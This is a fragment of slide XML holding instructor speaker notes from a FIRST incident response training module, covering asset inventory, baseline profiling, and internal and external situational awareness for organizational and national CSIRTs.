                <a:spcPts val="313"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The existing integrated inventory management system, if applicable, augmented as needed with home-grown scripts. Luckily there are a number of open-source and commercial systems to perform inventory management. When investigating a system, you’ll want to consider all the features, including the feasibility of integrating it into the rest of your infrastructure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="313"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Ask:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> How do you keep track of your assets? What system do you use and how tightly is it integrated to your security system?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="313"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Instructor notes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>You will likely find a range from simple for small organizations and sophisticated and integrated for larger organizations. Hopefully the students from smaller organizations will be able to influence their departments to spend a little money and time up front to support long-term efficiency.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57348" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BE99E8C-08DC-B441-9CCC-21CDE7B60F3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3E501D98-C8C2-D747-9ACB-A85EC1CA052F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57349" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0799E6B-0943-854C-A721-CF497AD31170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</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9394" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8145E79A-D9AE-F243-AC23-FDE6428369FD}"/>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EAB7A105-47F3-9D45-B016-5D0697C217AA}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81921" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEE17072-19E5-934E-95A2-F9519E6A893C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247650" y="3914775"/>
            <a:ext cx="6361113" cy="6416675"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Internal Situational Awareness for Organizational CSIRTs: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>1 minute</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>In addition to maintaining information on all your network-connected assets, you will want to continually profile and adjust those assets. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="14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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Typical data to profile are network traffic, system, and application usage. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="14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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Saving known valid states allows you to more quickly detect anomalies from a previously known state in your environment. All this information helps you enhance your situational awareness. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="14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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>With this knowledge, you can determine whether these deviations are malicious (a new attack has entered your internal environment) or benign (your company brought online a new company with 100 new employees.) If you determine that this is a malicious aberration, your non-actionable anomaly is transformed into actionable information. A benign exception might lead to an action such as an update of valid ranges of data flow or users logged on. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Let’s look at the similarities and differences with internal situational awareness if you work for a national or regional CSIRT.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59396" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3E13A09-DC6E-C543-A7B9-ADB18BF771A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{A8F03421-F5D9-8F4B-ABD2-AEAE6F0FE1C8}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59397" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC1C1E9F-177E-F14B-85FF-7F2E2FFC5DC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</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442" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9F62B43-64E8-7144-AA59-D717FE0496F2}"/>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DC42850E-D8C8-0E44-8CE8-5F0E217370B4}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61443" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{320684BE-C77A-4C45-8B92-634A0C7AE9EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279400" y="3411538"/>
            <a:ext cx="6299200" cy="730091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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>National CSIRTs’ Internal Situational Awareness Is Different: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>4 minutes</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> When we say that national CSIRTs’ internal situational awareness is different, we are really talking about all CSIRTs with external constituencies including governmental, national, and regional CSIRTs and also Information Sharing and Analysis Centers, or ISACs, such as those for the financial, critical infrastructure, and automotive industries.</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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Although the processes and procedures of a national or regional CSIRT will be similar in nature, the details will be different. For example, the assets are dissimilar. First, the end-user base is on the order of millions of people and any number of organizations, although you will only deal directly with ISPs and other proxies. Also, instead of looking at the IP addresses within an organization, your asset will be all the allocated IP addresses within your country or region. As with organizational CSIRTs, some of your assets will be more vital than others. In general, a national or regional CSIRT’s essential assets will be your critical infrastructure and important industry sectors.</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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Unlike with organizational CSIRTs, you do not have the plethora of monitoring tools that your cohorts have at the national level. Most of your data sharing will come from individual organizations outside of your control. Because of this, you will likely have to do more manual analysis than your companion organizations and be responsible for developing custom tools. </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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Ask:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> If there are any analysts working in national or regional CSIRTs, how do you think your job of maintaining situational awareness differs from that of your peers?</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Instructor notes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>This just gives an opportunity to your other students to express their experiences. Try to show commonalities of approaches among different kinds of CSIRTs, especially the focus on situational awareness principles. </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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> You have now seen how situational awareness of internal data works for both individual CSIRTs and national or regional CSIRTs. So now let’s talk about external data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61444" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C852A31E-1303-254C-8E3D-A49D836E8D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{98FF3CBC-4E42-0A43-9113-DFD316771FCE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61445" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDD26A4E-6B7E-AA4A-A48F-88EB791D78FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</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3490" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF368782-D9AF-E741-B3A2-EC2525B3F0AD}"/>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121438C4-7766-1841-A6BF-DF66805B43FE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83969" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40DED8F1-D651-A845-8EC3-CD486BDCE0FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="173038" y="3921125"/>
            <a:ext cx="6511925" cy="6784975"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPct val="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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>External Situational Awareness a Greater Challenge: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>3 minutes</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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>External situational awareness is far more difficult than internal because by definition you lack of access to sources of risk and have less control over the data. For example, if you are the first victim of an attack, there is not yet any external information. But if you are the 100th target, there is likely an excellent set of data available to you. </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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>You will always want to be as effective as possible in any given situation, so you will likely prioritize uncovering the tactics of an attack over its root cause. If you can protect your assets without the extra effort of revealing the root cause you will likely move forward without that information. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Examples of vents requiring external situational awareness are spam campaigns or APT attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Search for C&amp;C servers, indicators of compromise, and other actionable information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Correlate what you find with previously-collected information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>One common challenge in external situational awareness is a lack of standard monitoring tools. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>There is a limited selection of tools for private sector organizations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" lvl="1" indent="-17938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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>You can partner with national and governmental CSIRTs to collect and share information.</a:t>
            </a:r>
